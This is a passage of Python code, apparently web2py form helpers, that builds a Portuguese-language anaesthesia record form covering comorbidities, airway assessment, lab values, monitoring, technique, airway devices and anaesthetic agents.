INPUT(_id='carregar_radio_hemod_sim',
_type='radio',
_name='carregar_hemodialise_peritoneal',
_value='T'),
'sim',
INPUT(_id='carregar_radio_hemod_nao',
_type='radio',
_name='carregar_hemodialise_peritoneal',
_value='F'),
'não',
BR(),
'Distúrbios Hemorrágicos: ',
INPUT(_type='hidden', _id='carregar_hidden_disturbios_hemorragicos', _name='carregar_hidden_disturbios_hemorragicos', _value=dados.disturbios_hemorragicos),
INPUT(_id='carregar_radio_dist_hemo_sim',
_type='radio',
_name='carregar_disturbios_hemorragicos',
_value='T'),
'sim',
INPUT(_id='carregar_radio_dist_hemo_nao',
_type='radio',
_name='carregar_disturbios_hemorragicos',
_value='F'),
'não',
BR(),
'AVC Prévio: ',
INPUT(_type='hidden', _id='carregar_hidden_avc_previo', _name='carregar_hidden_avc_previo', _value=dados.avc_previo),
INPUT(_id='carregar_radio_avc_previo_sim',
_type='radio',
_name='carregar_avc_previo',
_value='T'),
'sim',
INPUT(_id='carregar_radio_avc_previo_nao',
_type='radio',
_name='carregar_avc_previo',
_value='F'),
'não',
BR(),
'D. Psiquiátrica: ',
INPUT(_type='hidden', _id='carregar_hidden_doencas_psiquiatricas', _name='carregar_hidden_doencas_psiquiatricas', _value=dados.doencas_psiquiatricas),
INPUT(_id='carregar_radio_d_psi_sim',
_type='radio',
_name='carregar_doencas_psiquiatricas',
_value='T'),
'sim',
INPUT(_id='carregar_radio_d_psi_nao',
_type='radio',
_name='carregar_doencas_psiquiatrica',
_value='F'),
'não',
BR(),
'D. Neuromuscular: ',
INPUT(_type='hidden', _id='carregar_hidden_doencas_neuromuscular', _name='carregar_hidden_doencas_neuromuscular', _value=dados.doencas_neuromuscular),
INPUT(_id='carregar_radio_d_neuro_musc_sim',
_type='radio',
_name='carregar_doencas_neuromuscular',
_value='T'),
'sim',
INPUT(_id='carregar_radio_d_neuro_musc_nao',
_type='radio',
_name='carregar_doencas_neuromuscular',
_value='F'),
'não',
BR(),
'D. Reumática: ',
INPUT(_type='hidden', _id='carregar_hidden_doencas_reumaticas', _name='carregar_hidden_doencas_reumaticas', _value=dados.doencas_reumaticas),
INPUT(_id='carregar_radio_d_reuma_sim',
_type='radio',
_name='carregar_doencas_reumaticas',
_value='T'),
'sim',
INPUT(_id='carregar_radio_d_reuma_nao',
_type='radio',
_name='carregar_doencas_reumaticas',
_value='F'),
'não',
BR(),
'Alt. Neurológica: ',
INPUT(_type='hidden', _id='carregar_hidden_alteracao_neurologica', _name='carregar_hidden_alteracao_neurologica', _value=dados.alteracao_neurologica),
INPUT(_id='carregar_radio_alt_neuro_sim',
_type='radio',
_name='carregar_alteracao_neurologica',
_value='T'),
'sim',
INPUT(_id='carregar_radio_alt_neuro_nao',
_type='radio',
_name='carregar_alteracao_neurologica',
_value='F'),
'não',
BR(),
'Hemotransfusão prévia: ',
INPUT(_type='hidden', _id='carregar_hidden_hemotransfusao_previa', _name='carregar_hidden_hemotransfusao_previa', _value=dados.hemotransfusao_previa),
INPUT(_id='carregar_radio_hemo_prev_sim',
_type='radio',
_name='carregar_hemotransfusao_previa',
_value='T'),
'sim',
INPUT(_id='carregar_radio_hemo_prev_nao',
_type='radio',
_name='carregar_hemotransfusao_previa',
_value='F'),
'não',
),
)
)
)
),
DIV(_id='carregar_div_outros_dir',
*TABLE(
TR(
TD(
'Observações Gerais'
)
),
BR(),
TR(
TD(
INPUT(_type="hidden", _id='carregar_hidden_obs_gerais', _name='carregar_hidden_obs_gerais', _value=dados.obs_gerais),
TEXTAREA(_id='carregar_obs_gerais', _name='carregar_obs_gerais')
)
)
)
),
HR(),
'Medicamentos em uso:',
INPUT(_type='hidden', _id='carregar_hidden_medicamentos_em_uso', _name='carregar_hidden_medicamentos_em_uso', _value=dados.medicamentos_em_uso),
INPUT(_type='text', _id='carregar_medicamentos_em_uso', _name='carregar_medicamentos_em_uso', _value=dados.medicamentos_em_uso),
BR(),
'Alergias:',
INPUT(_type='hidden', _id='carregar_hidden_alergias', _name='carregar_hidden_alergias', _value=dados.alergias),
INPUT(_type='text', _id='carregar_alergias', _name='carregar_alergias', _value=dados.alergias),
BR(),
'Cirurgias Prévias / Antecedentes Anestésicos Pessoais e Familiares:',
INPUT(_type='hidden', _id='carregar_hidden_cirurgias_previas', _name='carregar_hidden_cirurgias_previas', _value=dados.cirurgias_previas),
INPUT(_type='text', _id='carregar_cirurgias_previas', _name='carregar_cirurgias_previas', _value=dados.cirurgias_previas),
HR(),
FIELDSET(
LEGEND(_id='carregar_lgd_vias_aereas',
*'VIAS AÉREAS')
),
BR(),
DIV(_id='carregar_div_cavidade_oral',
*FIELDSET(
LEGEND(_id='carregar_lgd_cavidade_oral',
*'CAVIDADE ORAL'),
INPUT(_type='hidden', _id='carregar_hidden_mallampati', _name='carregar_hidden_mallampati', _value=dados.mallampati),
'Mallampati: ',
SELECT(
OPTION('1', _value='MALLAPATI 1', _name='carregar_mallampati'),
OPTION('2', _value='MALLAPATI 2', _name='carregar_mallampati'),
OPTION('3', _value='MALLAPATI 3', _name='carregar_mallampati'),
OPTION('4', _value='MALLAPATI 4', _name='carregar_mallampati')
),
BR(),
'Abertura de boca limitada: ',
INPUT(_type='hidden', _id='carregar_hidden_abertura_boca', _name='carregar_hidden_abertura_boca', _value=dados.abertura_boca),
INPUT(_id='carregar_radio_aber_boca_sim',
_type='radio',
_name='carregar_abertura_boca',
_value='T'),
'sim',
INPUT(_id='carregar_radio_aber_boca_nao',
_type='radio',
_name='carregar_abertura_boca',
_value='F'),
'não',
BR(),
'Dentes Falhos: ',
INPUT(_type='hidden', _id='carregar_hidden_dentes_falhos', _name='carregar_hidden_dentes_falhos', _value=dados.dentes_falhos),
INPUT(_id='carregar_radio_dentes_falhos_sim',
_type='radio',
_name='carregar_dentes_falhos',
_value='T'),
'sim',
INPUT(_id='carregar_radio_dentes_falhos_nao',
_type='radio',
_name='carregar_dentes_falhos',
_value='F'),
'não',
BR(),
'Prótese Sup. - Inf.: ',
INPUT(_type='hidden', _id='carregar_hidden_protese', _name='carregar_hidden_protese', _value=dados.protese),
INPUT(_id='carregar_radio_protese_sim',
_type='radio',
_name='carregar_protese',
_value='T'),
'sim',
INPUT(_id='carregar_radio_protese_nao',
_type='radio',
_name='carregar_protese',
_value='F'),
'não',
BR(),
'Macroglossia: ',
INPUT(_type='hidden', _id='carregar_hidden_macroglossia', _name='carregar_hidden_macroglossia', _value=dados.macroglossia),
INPUT(_id='carregar_radio_macroglossia_sim',
_type='radio',
_name='carregar_macroglossia',
_value='T'),
'sim',
INPUT(_id='carregar_radio_macroglossia_nao',
_type='radio',
_name='carregar_macroglossia',
_value='F'),
'não',
)
),
DIV(_id='carregar_div_pescoco',
*FIELDSET(
LEGEND(_id='carregar_lgd_pescoco',
*'PESCOÇO'),
'Distância Esterno-Mento: ',
INPUT(_type='hidden', _id='carregar_hidden_distancia_esterno_mento', _name='carregar_hidden_distancia_esterno_mento', _value=dados.distancia_esterno_mento),
INPUT(_type='text', _id='carregar_dist_est_mento', _name='carregar_distancia_esterno_mento', _value=dados.distancia_esterno_mento),
BR(),
'Curto / Longo: ',
INPUT(_type='hidden', _id='carregar_hidden_pescoco_curto_longo', _name='carregar_hidden_pescoco_curto_longo', _value=dados.pescoco_curto_longo),
INPUT(_type='text', _id='carregar_curto_longo', _name='carregar_pescoco_curto_longo', _value=dados.pescoco_curto_longo),
BR(),
'Mobilidade cervical diminuida: ',
INPUT(_type='hidden', _id='carregar_hidden_mobilidade_cervical', _name='carregar_hidden_mobilidade_cervical', _value=dados.mobilidade_cervical),
INPUT(_type='text', _id='carregar_mob_cervical', _name='carregar_mobilidade_cervical', _value=dados.mobilidade_cervical),
BR(),
DIV(
FIELDSET(
'Massa cervical: ',
INPUT(_type='hidden', _id='carregar_hidden_massa_cervical', _name='carregar_hidden_massa_cervical', _value=dados.massa_cervical),
INPUT(_id='carregar_radio_massa_cervical_sim',
_type='radio',
_name='carregar_massa_cervical',
_value='T'),
'sim',
INPUT(_id='carregar_radio_massa_cervical_nao',
_type='radio',
_name='carregar_massa_cervical',
_value='F'),
'não',
)
),
BR(),
DIV(
FIELDSET(
'Desvio de traquéia: ',
INPUT(_type='hidden', _id='carregar_hidden_desvio_traqueia', _name='carregar_hidden_desvio_traqueia', _value=dados.desvio_traqueia),
INPUT(_id='carregar_radio_desvio_traqueia_sim',
_type='radio',
_name='carregar_desvio_traqueia',
_value='T'),
'sim',
INPUT(_id='carregar_radio_desvio_traqueia_nao',
_type='radio',
_name='carregar_desvio_traqueia',
_value='F'),
'não',
)
),
BR(),
'Distância Mento-Hióide: ',
INPUT(_type='hidden', _id='carregar_hidden_distancia_mento_hiloide', _name='carregar_hidden_distancia_mento_hiloide', _value=dados.distancia_mento_hiloide),
INPUT(_type='text', _id='carregar_dist_mento_hioide', _name='carregar_distancia_mento_hiloide', _value=dados.distancia_mento_hiloide),
BR(),
'Circunferência cervical: ',
INPUT(_type='hidden', _id='carregar_hidden_circunferencia_cervical', _name='carregar_hidden_circunferencia_cervical', _value=dados.circunferencia_cervical),
INPUT(_type='text', _id='carregar_circunferencia_cervical', _name='carregar_circunferencia_cervical', _value=dados.circunferencia_cervical),
)
),
DIV(_id='carregar_div_atencao',
*FIELDSET(
LEGEND(_id='carregar_lgd_atencao',
*'ATENÇÃO'),
'História Prévia Dificuldade de intubação: ',
INPUT(_type='hidden', _id='carregar_hidden_dificuldade_intubacao', _name='carregar_hidden_dificuldade_intubacao', _value=dados.dificuldade_intubacao),
INPUT(_type='checkbox', _id='carregar_chk_hist', _name='carregar_dificuldade_intubacao', _value='T'),
BR(),
'Via aérea dificil: ',
INPUT(_type='hidden', _id='carregar_hidden_via_aerea_dificil', _name='carregar_hidden_via_aerea_dificil', _value=dados.via_aerea_dificil),
INPUT(_type='checkbox', _id='carregar_chk_via_aerea_dif', _name='carregar_via_aerea_dificil', _value='T'),
BR(),
'História de anafilaxia: ',
INPUT(_type='hidden', _id='carregar_hidden_anafilaxia', _name='carregar_hidden_anafilaxia', _value=dados.historia_de_anafilaxia),
INPUT(_type='checkbox', _id='carregar_anafilaxia', _name='carregar_anafilaxia', _value='T'),
BR(),
'Estômago Cheio: ',
INPUT(_type='hidden', _id='carregar_hidden_estomago_cheio', _name='carregar_hidden_estomago_cheio', _value=dados.estomago_cheio),
INPUT(_type='checkbox', _id='carregar_chk_estomago_cheio', _name='carregar_estomago_cheio', _value='T'),
BR(),
'Repor. Corticóide: ',
INPUT(_type='hidden', _id='carregar_hidden_corticoide', _name='carregar_hidden_corticoide', _value=dados.corticoide),
INPUT(_type='checkbox', _id='carregar_chk_corticoide', _name='carregar_corticoide', _value='T'),
BR(),
'Profilaxia Endocardite Bacteriana: ',
INPUT(_type='hidden', _id='carregar_hidden_endocardite', _name='carregar_hidden_endocardite', _value=dados.endocardite_bacteriana),
INPUT(_type='checkbox', _id='carregar_profilaxia', _name='carregar_endocardite_bacteriana', _value='T'),
)
),
HR(),
DIV(_id='carregar_div_exames_laboratoriais',
*FIELDSET(
LEGEND(_id='carregar_lgd_exames_lab',
*'EXAMES LABORATORIAS'),
"HB: ",
INPUT(_type='hidden', _id='carregar_hidden_hb', _name='carregar_hidden_hb', _value=dados.hb),
INPUT(_type='text', _id='carregar_txt_hb', _name='carregar_hb', _value=dados.hb),
"HT: ",
INPUT(_type='hidden', _id='carregar_hidden_ht', _name='carregar_hidden_ht', _value=dados.ht),
INPUT(_type='text', _id='carregar_txt_ht', _name='carregar_ht', _value=dados.ht),
"HM: ",
INPUT(_type='hidden', _id='carregar_hidden_hm', _name='carregar_hidden_hm', _value=dados.hm),
INPUT(_type='text', _id='carregar_txt_hm', _name='carregar_hm', _value=dados.hm),
"Plaq: ",
INPUT(_type='hidden', _id='carregar_hidden_plaquetas', _name='carregar_hidden_plaquetas', _value=dados.plaquetas),
INPUT(_type='text', _id='carregar_txt_plaq', _name='carregar_plaquetas', _value=dados.plaquetas),
"Gli: ",
INPUT(_type='hidden', _id='carregar_hidden_glicose', _name='carregar_hidden_glicose', _value=dados.glicose),
INPUT(_type='text', _id='carregar_txt_gli', _name='carregar_glicose', _value=dados.glicose),
BR(),
"U: ",
INPUT(_type='hidden', _id='carregar_hidden_u', _name='carregar_hidden_u', _value=dados.u),
INPUT(_type='text', _id='carregar_txt_u', _name='carregar_u', _value=dados.u),
"CR: ",
INPUT(_type='hidden', _id='carregar_hidden_cr', _name='carregar_hidden_cr', _value=dados.cr),
INPUT(_type='text', _id='carregar_txt_cr', _name='carregar_cr', _value=dados.cr),
"NA+: ",
INPUT(_type='hidden', _id='carregar_hidden_na', _name='carregar_hidden_na', _value=dados.na),
INPUT(_type='text', _id='carregar_txt_na', _name='carregar_na', _value=dados.na),
"K+: ",
INPUT(_type='hidden', _id='carregar_hidden_k', _name='carregar_hidden_k', _value=dados.k),
INPUT(_type='text', _id='carregar_txt_k', _name='carregar_k', _value=dados.k),
)
),
HR(),
DIV(_id='carregar_div_eventos_operatorios',
*FIELDSET(
LEGEND(_id='carregar_lgd_eventos_operatorios',
*'EVENTOS OPERATÓRIOS'),
'Duração do Procedimento: ',
INPUT(_type='hidden', _id='carregar_hidden_duracao_procedimento', _name='carregar_hidden_duracao_procedimento', _value=dados.duracao_procedimento),
INPUT(_type='text', _id='carregar_txt_duracao_procedimento', _name='carregar_duracao_procedimento', _value=dados.duracao_procedimento),
BR(),
'Duração da Cirurgia: ',
INPUT(_type='hidden', _id='carregar_hidden_duracao_cirurgia', _name='carregar_hidden_duracao_cirurgia', _value=dados.duracao_cirurgia),
INPUT(_type='text', _id='carregar_txt_duracao_cirurgia', _name='carregar_duracao_cirurgia', _value=dados.duracao_cirurgia),
)
),
BR(),
HR(),
DIV(_id='carregar_div_monitorizacao',
*FIELDSET(
LEGEND(_id='carregar_lgd_monitorizacao',
*'MONITORIZAÇÃO'),
'Cardioscópio: ',
INPUT(_type='hidden', _id='carregar_hidden_cardioscopio', _name='carregar_hidden_cardioscopio', _value=dados.cardioscopio),
INPUT(_id='carregar_radio_cardioscopio_sim',
_type='radio',
_name='carregar_cardioscopio',
_value='T'),
'sim',
INPUT(_id='carregar_radio_cardioscopio_nao',
_type='radio',
_name='carregar_cardioscopio',
_value='F'),
'não',
BR(),
'Ox. Digital: ',
INPUT(_type='hidden', _id='carregar_hidden_ox_digital', _name='carregar_hidden_ox_digital', _value=dados.ox_digital),
INPUT(_id='carregar_radio_ox_digital_sim',
_type='radio',
_name='carregar_ox_digital',
_value='T'),
'sim',
INPUT(_id='carregar_radio_ox_digital_nao',
_type='radio',
_name='carregar_ox_digital',
_value='F'),
'não',
BR(),
'PNI: ',
INPUT(_type='hidden', _id='carregar_hidden_pni', _name='carregar_hidden_pni', _value=dados.pni),
INPUT(_id='carregar_radio_pni_sim',
_type='radio',
_name='carregar_pni',
_value='T'),
'sim',
INPUT(_id='carregar_radio_pni_nao',
_type='radio',
_name='carregar_pni',
_value='F'),
'não',
BR(),
'PAINV: ',
INPUT(_type='hidden', _id='carregar_hidden_painv', _name='carregar_hidden_painv', _value=dados.painv),
INPUT(_id='carregar_radio_painv_sim',
_type='radio',
_name='carregar_painv',
_value='T'),
'sim',
INPUT(_id='carregar_radio_painv_nao',
_type='radio',
_name='carregar_painv',
_value='F'),
'não',
BR(),
'CAPNÓGRAFO: ',
INPUT(_type='hidden', _id='carregar_hidden_capnografo', _name='carregar_hidden_capnografo', _value=dados.capnografo),
INPUT(_id='carregar_radio_capnografo_sim',
_type='radio',
_name='carregar_capnografo',
_value='T'),
'sim',
INPUT(_id='carregar_radio_capnografo_nao',
_type='radio',
_name='carregar_capnografo',
_value='F'),
'não',
BR(),
'An. Gases: ',
INPUT(_type='hidden', _id='carregar_hidden_an_gases', _name='carregar_hidden_an_gases', _value=dados.an_gases),
INPUT(_id='carregar_radio_an_gases_sim',
_type='radio',
_name='carregar_an_gases',
_value='T'),
'sim',
INPUT(_id='carregar_radio_an_gases_nao',
_type='radio',
_name='carregar_an_gases',
_value='F'),
'não',
BR(),
'outros: ',
INPUT(_type='hidden', _id='carregar_hidden_outros_monitorizacao', _name='carregar_hidden_outros_monitorizacao', _value=dados.outros_monitorizacao),
INPUT(_type='text', _id='carregar_outros_monitorizacao', _name='carregar_outros_monitorizacao', _value=dados.outros_monitorizacao)
)
),
DIV(_id='carregar_div_tecnica',
*FIELDSET(
LEGEND(_id='carregar_lgd_tecnica',
*'TÉCNICA'),
'Geral: ',
INPUT(_type='hidden', _id='carregar_hidden_tec_geral', _name='carregar_hidden_tec_geral', _value=dados.tec_geral),
INPUT(_id='carregar_radio_tec_geral_sim',
_type='radio',
_name='carregar_tec_geral',
_value='T'),
'sim',
INPUT(_id='carregar_radio_tec_geral_nao',
_type='radio',
_name='carregar_tec_geral',
_value='F'),
'não',
BR(),
INPUT(_type='hidden', _id='carregar_hidden_plexo', _name='carregar_hidden_plexo', _value=dados.plexo),
'Bloqueio regional ou Plexo: ',
INPUT(_id='carregar_radio_plexo_sim',
_type='radio',
_name='carregar_plexo',
_value='T'),
'sim',
INPUT(_id='carregar_radio_plexo_nao',
_type='radio',
_name='carregar_plexo',
_value='F'),
'não',
BR(),
INPUT(_type='hidden', _id='carregar_hidden_neuroeixo', _name='carregar_hidden_neuroeixo', _value=dados.bloqueio_neuroeixo),
'Bloqueio de Neuroeixo: ',
INPUT(_id='carregar_radio_neuroeixo_sim',
_type='radio',
_name='carregar_bloqueio_neuroeixo',
_value='T'),
'sim',
INPUT(_id='carregar_radio_neuroeixo_nao',
_type='radio',
_name='carregar_bloqueio_neuroeixo',
_value='F'),
'não',
BR(),
'Combinada: ',
INPUT(_type='hidden', _id='carregar_hidden_combinada', _name='carregar_hidden_combinada', _value=dados.combinada),
INPUT(_id='carregar_radio_combinada_sim',
_type='radio',
_name='carregar_combinada',
_value='T'),
'sim',
INPUT(_id='carregar_radio_combinada_nao',
_type='radio',
_name='carregar_combinada',
_value='F'),
'não',
BR(),
'Sedação: ',
INPUT(_type='hidden', _id='carregar_hidden_sedacao', _name='carregar_hidden_sedacao', _value=dados.sedacao),
INPUT(_id='carregar_radio_sedacao_sim',
_type='radio',
_name='carregar_sedacao',
_value='T'),
'sim',
INPUT(_id='carregar_radio_sedacao_nao',
_type='radio',
_name='carregar_sedacao',
_value='F'),
'não',
BR(),
)
),
DIV(_id='carregar_div_acesso_vias_aereas',
*FIELDSET(
LEGEND(_id='carregar_lgd_acesso_vias_aereas',
*'ACESSO A VIA AÉREA'),
'Sub Máscara: ',
INPUT(_type='hidden', _id='carregar_hidden_sub_mascara', _name='carregar_hidden_sub_mascara', _value=dados.sub_mascara),
INPUT(_id='carregar_radio_sub_mascara_sim',
_type='radio',
_name='carregar_sub_mascara',
_value='T'),
'sim',
INPUT(_id='carregar_radio_sub_mascara_nao',
_type='radio',
_name='carregar_sub_mascara',
_value='F'),
'não',
BR(),
'Canula Naso: ',
INPUT(_type='hidden', _id='carregar_hidden_canula_naso', _name='carregar_hidden_canula_naso', _value=dados.canula_naso),
INPUT(_id='carregar_radio_can_naso_sim',
_type='radio',
_name='carregar_canula_naso',
_value='T'),
'sim',
INPUT(_id='carregar_radio_can_naso_nao',
_type='radio',
_name='carregar_canula_naso',
_value='F'),
'não',
BR(),
'Canula Orofaringea: ',
INPUT(_type='hidden', _id='carregar_hidden_canula_orofaringea', _name='carregar_hidden_canula_orofaringea', _value=dados.canula_orofaringea),
INPUT(_id='carregar_radio_can_orofaringea_sim',
_type='radio',
_name='carregar_canula_orofaringea',
_value='T'),
'sim',
INPUT(_id='carregar_radio_can_orofaringea_nao',
_type='radio',
_name='carregar_canula_orofaringea',
_value='F'),
'não',
BR(),
'Máscara Laríngea: ',
INPUT(_type='hidden', _id='carregar_hidden_mascara_laringea', _name='carregar_hidden_mascara_laringea', _value=dados.mascara_laringea),
INPUT(_id='carregar_radio_masc_laringea_sim',
_type='radio',
_name='carregar_mascara_laringea',
_value='T'),
'sim',
INPUT(_id='carregar_radio_masc_laringea_nao',
_type='radio',
_name='carregar_mascara_laringea',
_value='F'),
'não',
DIV(_id='carregar_div_masc_laringea',
*FIELDSET(
'NR:',
INPUT(_type='hidden', _id='carregar_hidden_nr_mascara_laringea', _name='carregar_hidden_nr_mascara_laringea', _value=dados.nr_mascara_laringea),
INPUT(_typr='text', _id='carregar_nr_masc_laringea', _name='carregar_nr_mascara_laringea', _value=dados.nr_mascara_laringea)
)),
BR(),
'Intubação Oro Traqueal: ',
INPUT(_type='hidden', _id='carregar_hidden_intubacao_oro_traqueal', _name='carregar_hidden_intubacao_oro_traqueal', _value=dados.intubacao_oro_traqueal),
INPUT(_id='carregar_radio_int_oro_traqueal_sim',
_type='radio',
_name='carregar_intubacao_oro_traqueal',
_value='T'),
'sim',
INPUT(_id='carregar_radio_int_oro_traqueal_nao',
_type='radio',
_name='carregar_intubacao_oro_traqueal',
_value='F'),
'não',
DIV(_id='carregar_div_int_oro_traqueal',
*FIELDSET(
'Diâmetro do tubo: ',
INPUT(_type='hidden', _id='carregar_hidden_intubacao_oro_traqueal', _name='carregar_hidden_intubacao_oro_traqueal', _value=dados.diametro_tubo),
INPUT(_typr='text', _id='carregar_diametro_tubo', _name='carregar_diametro_tubo'),
BR(),
'Tipo naso: ',
INPUT(_type='hidden', _id='carregar_hidden_tipo_naso', _name='carregar_hidden_tipo_naso', _value=dados.tipo_naso),
INPUT(_id='carregar_radio_tipo_naso_sim',
_type='radio',
_name='carregar_tipo_naso',
_value='T'),
'sim',
INPUT(_id='carregar_radio_tipo_naso_nao',
_type='radio',
_name='carregar_tipo_naso',
_value='F'),
'não',
BR(),
'Tipo aramado: ',
INPUT(_type='hidden', _id='carregar_hidden_tipo_aramado', _name='carregar_hidden_tipo_aramado', _value=dados.tipo_aramado),
INPUT(_id='carregar_radio_tipo_aramado_sim',
_type='radio',
_name='carregar_tipo_aramado',
_value='T'),
'sim',
INPUT(_id='carregar_radio_tipo_aramado_nao',
_type='radio',
_name='carregar_tipo_aramado',
_value='F'),
'não',
BR(),
'Tipo dupla luz: ',
INPUT(_type='hidden', _id='carregar_hidden_dupla_luz', _name='carregar_hidden_dupla_luz', _value=dados.dupla_luz),
INPUT(_id='carregar_radio_tipo_dupla_luz_sim',
_type='radio',
_name='carregar_dupla_luz',
_value='T'),
'sim',
INPUT(_id='carregar_radio_tipo_dupla_luz_nao',
_type='radio',
_name='carregar_dupla_luz',
_value='F'),
'não',
BR(),
'Tipo balao: ',
INPUT(_type='hidden', _id='carregar_hidden_balao', _name='carregar_hidden_balao', _value=dados.balao),
INPUT(_id='carregar_radio_balao_sim',
_type='radio',
_name='carregar_balao',
_value='T'),
'sim',
INPUT(_id='carregar_radio_balao_nao',
_type='radio',
_name='carregar_balao',
_value='F'),
'não',
BR(),
'Laringoscopia: ',
INPUT(_type='hidden', _id='carregar_hidden_laringoscopia', _name='carregar_hidden_laringoscopia', _value=dados.laringoscopia),
INPUT(_id='carregar_radio_laringoscopia_sim',
_type='radio',
_name='carregar_laringoscopia',
_value='T'),
'sim',
INPUT(_id='carregar_radio_laringoscopia_nao',
_type='radio',
_name='carregar_laringoscopia',
_value='F'),
'não',
BR(),
'Broncofibroscopia: ',
INPUT(_type='hidden', _id='carregar_hidden_broncofibroscopia', _name='carregar_hidden_broncofibroscopia', _value=dados.broncofibroscopia),
INPUT(_id='carregar_radio_broncofibroscopia_sim',
_type='radio',
_name='carregar_broncofibroscopia',
_value='T'),
'sim',
INPUT(_id='carregar_radio_broncofibroscopia_nao',
_type='radio',
_name='carregar_broncofibroscopia',
_value='F'),
'não',
BR(),
'Estilete luminoso: ',
INPUT(_type='hidden', _id='carregar_hidden_estilete_luminoso', _name='carregar_hidden_estilete_luminoso', _value=dados.estilete_luminoso),
INPUT(_id='carregar_radio_est_luminoso_sim',
_type='radio',
_name='carregar_estilete_luminoso',
_value='T'),
'sim',
INPUT(_id='carregar_radio_est_luminoso_nao',
_type='radio',
_name='carregar_estilete_luminoso',
_value='F'),
'não',
BR(),
'Videolaringoscopia: ',
INPUT(_type='hidden', _id='carregar_hidden_videolaringoscopia', _name='carregar_hidden_videolaringoscopia', _value=dados.videolaringoscopia),
INPUT(_id='carregar_radio_videolaringoscopia_sim',
_type='radio',
_name='carregar_videolaringoscopia',
_value='T'),
'sim',
INPUT(_id='carregar_radio_videolaringoscopia_nao',
_type='radio',
_name='carregar_videolaringoscopia',
_value='F'),
'não',
)
),
BR(),
)
),
HR(),
BR(),
DIV(_id='carregar_div_agentes',
*FIELDSET(
LEGEND(_id='carregar_lgd_agentes',
*'Agentes'),
DIV('Nome: ',
INPUT(_type='hidden', _id='carregar_agente1_controle', _name='carregar_agente1_controle', _value=dados.agente1),
INPUT(_type='text', _id='carregar_agente1', _name='carregar_agente1', _value=dados.agente1),
INPUT(_type='button', _id='carregar_btn_inclui_agente1', _name='carregar_btn_inclui_agente1', _value= '+', _onclick='chama_segundo()'),
_id='div_primero_agente'
),
DIV('Nome: ',
INPUT(_type='text', _id='carregar_agente2', _name='carregar_agente2', _value=dados.agente2),
INPUT(_type='hidden', _id='carregar_agente2_controle', _name='carregar_agente2_controle', _value=dados.agente2),
INPUT(_type='button', _id='carregar_btn_esconder_agente2', _name='carregar_btn_esconder_agente2', _value='-', _onclick= 'esconde_segundo()'),
INPUT(_type='button', _id='carregar_btn_inclui_agente2', _name='carregar_btn_inclui_agente2', _value='+', _onclick= 'chama_terceiro()'),
_id='div_segundo_agente'
),
DIV('Nome: ',
INPUT(_type='text', _id='carregar_agente3', _name='carregar_agente3', _value=dados.agente3),
INPUT(_type='hidden', _id='carregar_agente3_controle', _name='carregar_agente3_controle', _value=dados.agente3),
INPUT(_type='button', _id='carregar_btn_esconder_agente3', _name='carregar_btn_esconder_agente3', _value='-', _onclick='esconde_terceiro()'),
INPUT(_type='button', _id='carregar_btn_inclui_agente3', _name='carregar_btn_inclui_agente3', _value='+', _onclick='chama_quarto()'),
_id='div_terceiro_agente'
),
DIV('Nome: ',
INPUT(_type='text', _id='carregar_agente4', _name='carregar_agente4', _value=dados.agente4),
INPUT(_type='hidden', _id='carregar_agente4_controle', _name='carregar_agente4_controle', _value=dados.agente4),
INPUT(_type='button', _id='carregar_btn_esconder_agente4', _name='carregar_btn_esconder_agente4', _value='-', _onclick='esconde_quarto()'),
INPUT(_type='button', _id='carregar_btn_inclui_agente4', _name='carregar_btn_inclui_agente4', _value='+', _onclick='chama_quinto()'),
_id='div_quarto_agente'),
DIV('Nome: ',
INPUT(_type='text', _id='carregar_agente5', _name='carregar_agente5', _value=dados.agente5),
INPUT(_type='hidden', _id='carregar_agente5_controle', _name='carregar_agente5_controle', _value=dados.agente5),
INPUT(_type='button', _id='carregar_btn_esconder_agente5', _name='carregar_btn_esconder_agente5', _value='-', _onclick='esconde_quinto()'),
INPUT(_type='button', _id='carregar_btn_inclui_agente5', _name='carregar_btn_inclui_agente5', _value='+', _onclick='chama_sexto()'),
_id='div_quinto_agente'
),
DIV('Nome: ',
INPUT(_type='text', _id='carregar_agente6', _name='carregar_agente6', _value=dados.agente6),
INPUT(_type='hidden', _id='carregar_agente6_controle', _name='carregar_agente6_controle', _value=dados.agente6),
INPUT(_type='button', _id='carregar_btn_esconder_agente6', _name='carregar_btn_esconder_agente6', _value='-', _onclick='esconde_sexto()'),
INPUT(_type='button', _id='carregar_btn_inclui_agente6', _name='carregar_btn_inclui_agente6', _value='+', _onclick='chama_setimo()'),
_id='div_sexto_agente'
),
DIV('Nome: ',
INPUT(_type='text', _id='carregar_agente7', _name='carregar_agente7', _value=dados.agente7),
INPUT(_type='hidden', _id='carregar_agente7_controle', _name='carregar_agente7_controle', _value=dados.agente7),
INPUT(_type='button', _id='carregar_btn_esconder_agente7', _name='carregar_btn_esconder_agente7', _value='-', _onclick='esconde_setimo()'),
INPUT(_type='button', _id='carregar_btn_inclui_agente7', _name='carregar_btn_inclui_agente7', _value='+', _onclick='chama_oitavo()'),
_id='div_setimo_agente'
),
DIV('Nome: ',
INPUT(_type='text', _id='carregar_agente8', _name='carregar_agente8', _value=dados.agente8),
INPUT(_type='hidden', _id='carregar_agente8_controle', _name='carregar_agente8_controle', _value=dados.agente8),
INPUT(_type='button', _id='carregar_btn_esconder_agente8', _name='carregar_btn_esconder_agente8', _value='-', _onclick='esconde_oitavo()'),
INPUT(_type='button', _id='carregar_btn_inclui_agente8', _name='carregar_btn_inclui_agente8', _value='+', _onclick='chama_nono()'),
_id='div_oitavo_agente'
),
DIV('Nome: ',
INPUT(_type='text', _id='carregar_agente9', _name='carregar_agente9', _value=dados.agente9),
INPUT(_type='hidden', _id='carregar_agente9_controle', _name='carregar_agente9_controle', _value=dados.agente9),
INPUT(_type='button', _id='carregar_btn_esconder_agente9', _name='carregar_btn_esconder_agente9', _value='-', _onclick='esconde_nono()'),
INPUT(_type='button', _id='carregar_btn_inclui_agente9', _name='carregar_btn_inclui_agente9', _value='+', _onclick='chama_decimo()'),
_id='div_nono_agente'
),
DIV('Nome: ',
INPUT(_type='text', _id='carregar_agente10', _name='carregar_agente10', _value=dados.agente10),
INPUT(_type='hidden', _id='carregar_agente10_controle', _name='carregar_agente10_controle', _value=dados.agente10),
INPUT(_type='button', _id='carregar_btn_esconder_agente10', _name='carregar_btn_inclui_agente10', _value='-', _onclick='esconde_decimo()'),
_id='div_decimo_agente'
),
)),
BR(),
HR(),
FIELDSET(
LEGEND(_id='carregar_lgd_dados_cirurgia',
*'DADOS CIRURGIA'),
'Cirurgia: ',
INPUT(_type='hidden', _id='carregar_hidden_cirurgia', _name='carregar_hidden_cirurgia', _value=dados.cirurgia),
INPUT(_type='text', _id='carregar_cirurgia', _name='carregar_cirurgia', _value=dados.cirurgia),
BR(),
